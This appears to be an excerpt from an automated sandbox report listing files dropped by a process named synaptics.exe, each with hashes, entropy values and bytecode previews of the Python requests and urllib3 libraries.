                                                                                                                                                                                                            Preview:o..........g.H.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...z.d.d.l.Z.W.n...e.y5......d.d.l.Z.Y.n.w.G.d.d...d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.d.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e.j.e...Z.d.d...Z.d.d...Z.d.d...Z.d d.d...Z.d.d...Z.d.S.)!z..requests.cookies.~~~~~~~~~~~~~~~~..Compatibility code to be able to use `http.cookiejar.CookieJar` with requests...requests.utils imports from here, so be careful with imports.......N.....)...to_native_string)...Morsel..MutableMapping..cookielib..urlparse..urlunparsec....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.d.S.) ..MockRequesta....Wraps a `requests.Request` to mimic a `urllib2.Request`... The code in `http.cookiejar.CookieJar` expects this interface in order to correctly. manage cookie policies, i.e., determine whether a cookie can be set, given the. domains of th
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6208
                                                                                                                                                                                                            Entropy (8bit):4.924006211048709
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:CrpcCB6P/5IldtEEJiCr6dNtQlrnlGkh98RZR1YgvOHwXx:CrpixIlv/JPr6OgH2Qh
                                                                                                                                                                                                            MD5:036562B0BE135FCAC201EE69D75B0C82
                                                                                                                                                                                                            SHA1:D647884AAA8F8B1E2297BD3E132A3D12B9FF08DE
                                                                                                                                                                                                            SHA-256:EDE13B11C0F6F38E19E2094243212448DFE7AA5AB012343C0F14CECAA98CB6FF
                                                                                                                                                                                                            SHA-512:F5BA6A646D4C5576107BCA3C86CF4395ABBF3FFABF6C7762A46E48DE9CECF24A4BBA21A5FEDB12DDFD591E8C37790A416A5FD02B747F29B1F9B8912C56F0D75E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d ..d e.e...Z.G.d!d"..d"e.e...Z.G.d#d$..d$e.e...Z.G.d%d&..d&e...Z.G.d'd(..d(e...Z.G.d)d*..d*e.e...Z.G.d+d,..d,e.e...Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.G.d1d2..d2e...Z.G.d3d4..d4e.e ..Z!G.d5d6..d6e...Z"d7S.)8z`.requests.exceptions.~~~~~~~~~~~~~~~~~~~..This module contains the set of Requests' exceptions.......)...HTTPError.....)...JSONDecodeErrorc........................s ...e.Z.d.Z.d.Z...f.d.d...Z.....Z.S.)...RequestExceptionzTThere was an ambiguous exception that occurred while handling your. request.. c........................sX...|...d.d...}.|.|._.|...d.d...|._.|.d.u.r!|.j.s!t.|.d...r!|.j.j.|._.t...j.|.i.|.......d.S.).zBInitialize RequestException with `request` and `response` objects...resp
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):973
                                                                                                                                                                                                            Entropy (8bit):5.247736205109825
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:Mlx1qlJ5pMUqTDP/+/khfamY+qnvWZ3b1e7N:MsRyDPGkNYxS3bUx
                                                                                                                                                                                                            MD5:F782D6AFA265B08CA352C6BD01B300B2
                                                                                                                                                                                                            SHA1:E88073464B43545654392648C2B7D1676F329634
                                                                                                                                                                                                            SHA-256:2A6F6264623551BC11A8E4F602389DAA3A0214FD18047D90A7CEC38CD0469C74
                                                                                                                                                                                                            SHA-512:7DD939373C2E491E7A93710447C40F11C317BF27DDA5CFEEAEED9B2D069183865DD391268C2A382C09A78EE0B0494561F0647C81CA318BFC9EFB0C75316EBE73
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.g.Z.d.d...Z.d.d...Z.d.S.).z..requests.hooks.~~~~~~~~~~~~~~..This module provides the capabilities for the Requests hooks system...Available hooks:..``response``:. The response generated from a Request....responsec....................C...s....d.d...t.D...S.).Nc....................S...s....i.|.].}.|.g...q.S...r....)....0..eventr....r.....KC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\requests\hooks.py..<dictcomp>....s......z!default_hooks.<locals>.<dictcomp>)...HOOKSr....r....r....r......default_hooks....s......r....c....................K...sP...|.p.i.}.|...|...}.|.r&t.|.d...r.|.g.}.|.D.].}.|.|.f.i.|.....}.|.d.u.r%|.}.q.|.S.).z6Dispatches a hook dictionary on a given piece of data...__call__N)...get..hasattr)...key..hooksZ.hook_data..kwargs..hookZ._hook_datar....r....r......dispatch_hook....s..........................r....N)...__doc__r....r....r....r....r....r....r......<module>....s............
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):24195
                                                                                                                                                                                                            Entropy (8bit):5.465037673640826
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:d34FgR7uY/Gf9b7UxmzVmwYB984Z2YbwFkeeiZIuWEKbXN7:d316Y/GpKmzVmVB9tZ2YbwFeQgEKbXN7
                                                                                                                                                                                                            MD5:C4C686240DC94EAC244EBFF074385EF6
                                                                                                                                                                                                            SHA1:964F615A2549C05A2467A2F881F3666AC6DEB429
                                                                                                                                                                                                            SHA-256:814742CCD7A401F20615DE4FC63C1867A761DD0B8A9A3644B9F56558FF379AB0
                                                                                                                                                                                                            SHA-512:59C73F8B12EDB42EC36F7431379B9D532981EA9ECDB91A70EF6FB9B273FFBCED6A523D89660C487115960C83DA3B434F63F1A7C63B8533B9AD90BE559AF2F5E8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gZ........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z ..d.d.l.m!Z!m"Z"m#Z#..d.d.l$m%Z%m&Z&m'Z'..d.d.l(m)Z)m*Z*m+Z+m,Z,m-Z-m.Z...d.d.l(m.Z/..d.d.l(m0Z0..d.d.l(m.Z1..d.d.l(m2Z2..d.d.l3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:m;Z;m<Z<m=Z=m>Z>m?Z?m@Z@mAZAmBZBmCZC..e6jDe6jEe6jFe6jGe6jHf.ZId.ZJd.ZKd.ZLG.d.d...d...ZMG.d.d...d...ZNG.d.d ..d eN..ZOG.d!d"..d"eMeN..ZPG.d#d$..d$..ZQd.S.)%z`.requests.models.~~~~~~~~~~~~~~~..This module contains the primary objects that power Requests.......N)...UnsupportedOperation)...DecodeError..LocationParseError..ProtocolError..ReadTimeoutError..SSLError)...RequestField)...encode_multipart_formdata)...parse_url.....)...to_native_string..unicode_is_ascii)...HTTPBasicAuth)...Callable..JSONDecodeError..Mapping..basestring..builtin_str..chardet..cookielib)...json)...urlencode..urlsplit..urlunparse)..._copy_
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):610
                                                                                                                                                                                                            Entropy (8bit):5.462111224002614
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:COGzQ2Z1N6EzEq+sH5MWR6hxtRHV/bCJHRi/uelmXifqI0I9IGmnfsZRhCUV/X:Pqwnq+sHIztRERi/uAfz3pmnfahCmX
                                                                                                                                                                                                            MD5:9D6ACB15C9E77ED3BF131549C583569C
                                                                                                                                                                                                            SHA1:24783643D24EE9D297F1A6A8BC15B403E560365C
                                                                                                                                                                                                            SHA-256:5D7B2B78527C89778545A32B1F280BF75E603E7FC549A110F75BDF0C5182091D
                                                                                                                                                                                                            SHA-512:8FFC7259767848F28578488408EC8B2896BF52CF9D45772B8E09C78601F0B9D8B3FA4E3825CCDAC2C41A0CC0072633C52FCBFE8C475980B7BF039FAE3C46518A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d.l.m.Z...d.D.](Z.e.e...e...e.<.e.e.j...D.].Z.e.e.k.s(e...e...d.....r3e.j.e...e.j.d.e.....<.q.q.e.d.u.rke.j.Z.e.e.j...D.]+Z.e.e.k.sOe...e...d.....rje.j.e...Z.e.e.j.d.e.....<.e...e.d...Z.e.e.j.d.e.....<.qAd.S.d.S.)......N.....)...chardet)...urllib3..idna...z.requests.packages.r....)...sys..compatr......package..__import__..locals..list..modules..mod..startswith..__name__..targetZ.imported_mod..replace..r....r.....NC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\requests\packages.py..<module>....s(...........................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):19703
                                                                                                                                                                                                            Entropy (8bit):5.466659265852559
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:oKLx6UqoGz2kdHyVf6jLBvYANUwZaBk2bNHn8Qq:FFHGFHRjW2c/n8b
                                                                                                                                                                                                            MD5:F5B28BE977908086AC749367CF792982
                                                                                                                                                                                                            SHA1:93294841EA8CF46A220B84C3CA9B2230A4934DEE
                                                                                                                                                                                                            SHA-256:77D095D270623889B7C5F5814AE7678E4024FFAC2189296E99F1430B1320C9C7
                                                                                                                                                                                                            SHA-512:E3C4D19A923A08C8BF87E1AF3DD6DA2BA4C2E52A248627403D9B39599C96A19C1DA91AE60B5744341C04F61D2E81CEF3F41C44730723572F0D1383BCE816DF9E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.w.......................@...sj...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l m!Z!m"Z"m#Z#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*m+Z+m,Z,m-Z-m.Z.m/Z/m0Z0m1Z1m2Z2m3Z3..e.j4d.k.r.e.j5Z6n.e.j.Z6e.f.d.d...Z7e.f.d.d...Z8G.d.d...d...Z9G.d.d...d.e9..Z:d.d...Z;d.S.).z..requests.sessions.~~~~~~~~~~~~~~~~~..This module provides a Session object to manage and persist settings across.requests (cookies, auth, proxies).......N)...OrderedDict)...timedelta.....)...to_native_string)...HTTPAdapter)..._basic_auth_str)...Mapping..cookielib..urljoin..urlparse)...RequestsCookieJar..cookiejar_from_dict..extract_cookies_to_jar..merge_cookies)...ChunkedEncodingError..ContentDecodingError..InvalidSchema..TooManyRedirects)...default_hooks..dispatch_hook)...DEFAULT_REDIRECT_LIMIT..REDIRECT_STATI..PreparedRequest..Request)...codes)...CaseInsensitiveDict)...DEFAULT_P
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4723
                                                                                                                                                                                                            Entropy (8bit):5.739966461831131
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:3+vEE3B8QaXQ/aMZaSUp8DuaiCSu6woOXRAdeMG2F4K1r7w:3Wn3WKfr/piTNg+eCFs
                                                                                                                                                                                                            MD5:1E0D00805BF12DACDF1F853BCE290D81
                                                                                                                                                                                                            SHA1:2A73403DD95ACB95E5E79C5F8D628AF07675D32E
                                                                                                                                                                                                            SHA-256:215A4F7847556BE8FE009F3B79F255DD00C126E3DD0AAF4B83B60BBEB101176C
                                                                                                                                                                                                            SHA-512:74230A6CC946E19C10CF6D3EC9D416BBCA53867463BEF90E5A7673D01239935A0A8E414E64E1BF93F65465F65E9D4C861AC51880CC9342EE2598EDD8156653B5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.a.d.d.l.m.Z...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..i.d%d&..d'd(..d)d*..d+d,..d-d...d/d0..d1d2..d3d4..d5d6..d7d8..d9d:..d;d<..d=d>..d?d@..dAdB..dCdD..dEdF....i.dGdH..dIdJ..dKdL..dMdN..dOdP..dQdR..dSdT..dUdV..dWdX..dYdZ..d[d\..d]d^..d_d`..dadb..dcdd..dedf..dgdh....i.didj..dkdl..dmdn..dodp..dqdr..dsdt..dudv..dwdx..dydz..d{d|..d}d~..d.d...d.d...d.d...d.d...d.d...d.d.....Z.e.d.d...Z.d.d...Z.e.....d.S.).a.....The ``codes`` object defines a mapping from common names for HTTP statuses.to their numerical codes, accessible either as attributes or as dictionary.items...Example::.. >>> import requests. >>> requests.codes['temporary_redirect']. 307. >>> requests.codes.teapot. 418. >>> requests.codes['\o/']. 200..Some codes have multiple names, and both upper- and lower-case versions of.the names are allowed. For example, ``codes.ok``, ``codes.OK``, and.``codes.okay
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4417
                                                                                                                                                                                                            Entropy (8bit):5.102572493706671
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:NVEvJgabXXYw+hwKMGZG3h+VLTovFx0qjax7evl:NUJrbXXLwtEhL39
                                                                                                                                                                                                            MD5:B863AE0AC56DF039891A30D4F49D4E46
                                                                                                                                                                                                            SHA1:D0421783237ADC2F82FEF7FB4F0E1A4C30EB5DAF
                                                                                                                                                                                                            SHA-256:7E1BC5C07CA5DE12C683A95E6F9C1509AD3005232513CB44CABCF587C66DE558
                                                                                                                                                                                                            SHA-512:4D4ED72D7072271BA24505922CEE12C8F09D283A00336BF8946F608A5C4EDD8AD8D46FC181C08A0350AA94B0C067B9FDCCDA3157FB4929200102853D3268CEA1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g`........................@...sD...d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).zO.requests.structures.~~~~~~~~~~~~~~~~~~~..Data structures that power Requests.......)...OrderedDict.....)...Mapping..MutableMappingc....................@...sb...e.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...CaseInsensitiveDicta....A case-insensitive ``dict``-like object... Implements all methods and operations of. ``MutableMapping`` as well as dict's ``copy``. Also. provides ``lower_items``... All keys are expected to be strings. The structure remembers the. case of the last key to be set, and ``iter(instance)``,. ``keys()``, ``items()``, ``iterkeys()``, and ``iteritems()``. will contain case-sensitive keys. However, querying and contains. testing is case insensitive::.. cid = CaseInsensitiveDict(). cid['Accept'] = 'application/json'. cid['aCCEPT'] == 'application/json'
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):24605
                                                                                                                                                                                                            Entropy (8bit):5.589475363630152
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:qwAXYu7d5j1OCC04lbTaUGMAuAWtNNMAMFFOCTGvq2iqkg+p/cdiGjYrUcszdvLk:q//54lPaQxA2usCTGGZcdzTR5vLk
                                                                                                                                                                                                            MD5:7D6027D6F29A95E97853FE6177033891
                                                                                                                                                                                                            SHA1:D543F4B6A163DDDAA4CC14B0039CE2F57558764B
                                                                                                                                                                                                            SHA-256:44BB6BC21493FE242AC328391F48995993DE95DD138724C382FBFA9E2E221566
                                                                                                                                                                                                            SHA-512:CC6A274CE93EC838B8E3CBF4D7FCC1D30F337799C3362B7C916EFD12DE535FFE321D5775E3A8A52E085936D01D80EAF7C9406F175A8736243270287B742163D7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gS........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m Z!..d.d.l.m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,m-Z-m.Z.m/Z/..d.d.l0m1Z1..d.Z2e..3..Z4d.d.d...Z5d..6e..7d.e.d.d...d.......Z8e.j9d.k.r.d.d...Z:d.d...Z"d.d...Z;d.d ..Z<dtd"d#..Z=d$d%..Z>d&d'..Z?e.j@d(d)....ZAd*d+..ZBd,d-..ZCd.d/..ZDd0d1..ZEdtd2d3..ZFd4d5..ZGd6d7..ZHd8d9..ZId:d;..ZJd<d=..ZKd>d?..ZLd@dA..ZMdBdC..ZNeOdD..ZPdEdF..ZQdGdH..ZRdIdJ..ZSdKdL..ZTdMdN..ZUdOdP..ZVe.j@dQdR....ZWdSdT..ZXdudUdV..ZYdWdX..ZZdvdYdZ..Z[dwd\d]..Z\d^d_..Z]d`da..Z^db._dc..Z`e`dd..Zae`de..Zbdfdg..Zcdhdi..Zddjdk..Zedldm..Zfdndo..Zgdpdq..Zhdrds..Zid.S.)xz..requests.utils.~~~~~~~~~~~~~~..This module provides utility functions that are used within Requests.that are also useful for external consumption.......N)...OrderedDict)...make_headers..parse_url..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6105
                                                                                                                                                                                                            Entropy (8bit):5.51362280761965
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:8/KVMbgcD9Q0jnBw/lM2oAHlKR2RPRlcLJCuhvPFor70S1lDhzQwePa/vpy6hqbh:JVIgchjjneT9CFCuh8NlBTePE4RrH
                                                                                                                                                                                                            MD5:57228DFE1E5CBBE59DD027FB5E498138
                                                                                                                                                                                                            SHA1:A9BE83E23F96B69CFDE54B58A6157CA924E1821E
                                                                                                                                                                                                            SHA-256:A1A15D79112FC5400B4F28978B5B3FC401F7EC6D28BD0E1B7620A9F5748E9E1A
                                                                                                                                                                                                            SHA-512:5581B0E58B82A0B630AC963700DB6B7886133F34AB38432EEF62820523959DDB87299A930615FEF0B58899BD19B1FC2DD2E338853536C3866B44C89CAFE3532D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gC........................@...s....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..z.d.d.l$Z$W.n...e%y{......Y.n"w.e$j&.'d...s.e..(d.e$j&..d...e.j)....n.e$j*d.k.r.e%d.e$j&..d.......d.Z+d.Z,e.Z.d.Z-e...e/...0e.......e.j1f.dBd.d...Z2[.e.j3d.e.j4d d!....e.j3d"e.j5d d!....e.j6f.dCd&d'..Z7e...Z8d.d.d.d d d d.d(d.d)..dDd>d?..Z9e.j:d@k.r.d.dAl;m<Z<..e<....d.S.d.S.)Eze.Python HTTP library with thread-safe connection pooling, file post support, user friendly, and more......)...annotationsN)...NullHandler.....)...exceptions)..._TYPE_BODY)...HTTPHeaderDict)...__version__)...HTTPConnectionPool..HTTPSConnectionPool..connection_from_url)..._TYPE_FIELDS..encode_multipart_formdata)...PoolManager..ProxyManager..proxy_from_url)...BaseHTTPResponse..HTTPResponse)...make_headers)...Retry)...Timeoutz.OpenSSL zUurllib3 v2 only suppo
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5680
                                                                                                                                                                                                            Entropy (8bit):5.125774254026654
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:E/rlS5d/T49ElnxsGaqlYrxg5BLYrrN/jFV/5/iWb01GJwIGdP2vI5PAv/Atd2Nq:Ezlod/89El98SGrpn5/iWb01GJBvI5Px
                                                                                                                                                                                                            MD5:817804A31CB406CBE6DDB5DBDDFAD518
                                                                                                                                                                                                            SHA1:53198B0C538E8C2D46E5D5B890CB50F3B7D2D700
                                                                                                                                                                                                            SHA-256:F9B5E65FBBA45F754B168FAC081411236CDFB7CED6690753A59861ED3F684243
                                                                                                                                                                                                            SHA-512:0AB381BA80BD099F9AD1CBF36970E2C4546FC5018865671699D936C62D88096E24F60FEFEEBCDAFB9A5D04A496BE6AFBAD67625196F34D713A1071BDD343BAA2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.j.e.e.j.e.j...e.j.e...e.f...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.e.j.rfd.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.G.d.d...d.e.e...Z.d.S.d.S.)......)...annotationsN.....)..._TYPE_SOCKET_OPTIONS)..._DEFAULT_TIMEOUT.._TYPE_TIMEOUT)...Urlc....................@...s....e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)...ProxyConfig..ssl.SSLContext | None..ssl_context..boolZ.use_forwarding_for_https."None | str | typing.Literal[False]..assert_hostname..str | None..assert_fingerprintN....__name__..__module__..__qualname__..__annotations__..r....r.....UC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\_base_connection.pyr........s..............r....c....................@...s6...e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)..._ResponseOptions..strZ.request_methodZ.request_urlr......preload_content..decode_content..enforce_content_lengthNr....r....r....r....r..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16246
                                                                                                                                                                                                            Entropy (8bit):5.259550866587534
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:8gFpjR4qRg8OGlm9VP0Zxfl9Zg2j142c84ll4OERj4T/gW9lYyscf:Daf8O4m9VPaxfS2Sl4ORTvNso
                                                                                                                                                                                                            MD5:EBDD390A414AA542C0E87994E86181EB
                                                                                                                                                                                                            SHA1:72C144AEB21B10D0CDE4018FF8C115D11E485552
                                                                                                                                                                                                            SHA-256:F575C51745BFB7463195E90F43750846B9E6C4E120940126A65005470E18E98D
                                                                                                                                                                                                            SHA-512:0825AA4AC17F7F32D620B93B5C1603E81CCFFAB7E77101CE1423536FAAAC2C35C9241080360D8637803827A980CDC3E3AC76A332EB2C7EC87023D6887F0F68C4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.C.......................@...s:...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.j.r5d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.d.g.Z.e...d...Z.e...d...Z.e...d...Z.e.j.d.e.j.e.e.f...e.j.e.j.e.e.f.....d.f...Z.G.d.d...d.e...Z.d.d.d...Z.G.d.d...d.e.j.e.e.f...e.j.e.e.f.....Z.G.d.d...d.e.j.e.j.e.e.f.......Z G.d.d...d.e.j.e.e.f.....Z!d.S.)......)...annotationsN)...OrderedDict)...Enum..auto)...RLock)...Protocol)...Selfc....................@...s ...e.Z.d.Z.d.d.d...Z.d.d.d...Z.d.S.)...HasGettableStringKeys..return..typing.Iterator[str]c....................C........d.S...N......selfr....r.....QC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\_collections.py..keys...........z.HasGettableStringKeys.keys..key..strc....................C...r....r....r......r....r....r....r....r......__getitem__....r....z!HasGettableStringKeys.__getitem__N..r....r......r....r....r....r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r........s..........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9089
                                                                                                                                                                                                            Entropy (8bit):5.257189408658693
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:kR6oSXCyaq9B8lhwzOcHtKtABQSMSrcMmh:66oeYq9H6cHTBBMSrcMmh
                                                                                                                                                                                                            MD5:387AE763C8ECF249E8798D221E7E1AAA
                                                                                                                                                                                                            SHA1:5AD8A1F56CF47BCF4B229E064A7E02188A4FFF8D
                                                                                                                                                                                                            SHA-256:B5C7BC77DF900394D106128BFA0102ABB822C3E2F5EED020CC45D544311AEEBC
                                                                                                                                                                                                            SHA-512:DCE5C848D00D2F87E472C48F083AD74162B5E24D4F8625033CDC33B9F52BEA5DC30623C1E9A34443824533A7CF49C20D360D9A8C15CE06E137F5456FC104EB0D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.&.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.g.Z.e.j.e.j.e.j.e.e.j.e.e.f...f.....e.j.e.e.j.e.e.f...f...f...Z.G.d.d...d...Z.d.S.)......)...annotationsN)...urlencode.....)..._TYPE_BODY)...HTTPHeaderDict)..._TYPE_FIELDS..encode_multipart_formdata)...BaseHTTPResponse..RequestMethodsc....................@...sp...e.Z.d.Z.d.Z.h.d...Z.d%d&d.d...Z.........d'd(d.d...Z.........d)d*d.d...Z.....d+d,d!d"..Z.........d'd-d#d$..Z.d.S.).r....a..... Convenience mixin for classes who implement a :meth:`urlopen` method, such. as :class:`urllib3.HTTPConnectionPool` and. :class:`urllib3.PoolManager`... Provides behavior for making common types of HTTP request methods and. decides which type of request field encoding to use... Specifically,.. :meth:`.request_encode_url` is for sending requests whose fields are. encoded in the URL (such as GET, HEAD, DELETE)... :meth:`.request_encode_body`
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):493
                                                                                                                                                                                                            Entropy (8bit):5.405678450564785
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:CW2KjR85Yr3auej47+y9pfsxiZ8I4srEkJ:dQwauQ09pfGitrEC
                                                                                                                                                                                                            MD5:726D77681C7EB15EB382403A3EB698F8
                                                                                                                                                                                                            SHA1:EB1734393A41D02830ED3D48C57D08154AF60D10
                                                                                                                                                                                                            SHA-256:D6249A39C9938365FF1D992224C0E3E5D212AB827B55DB1D2BB1FBF7CC2ACB32
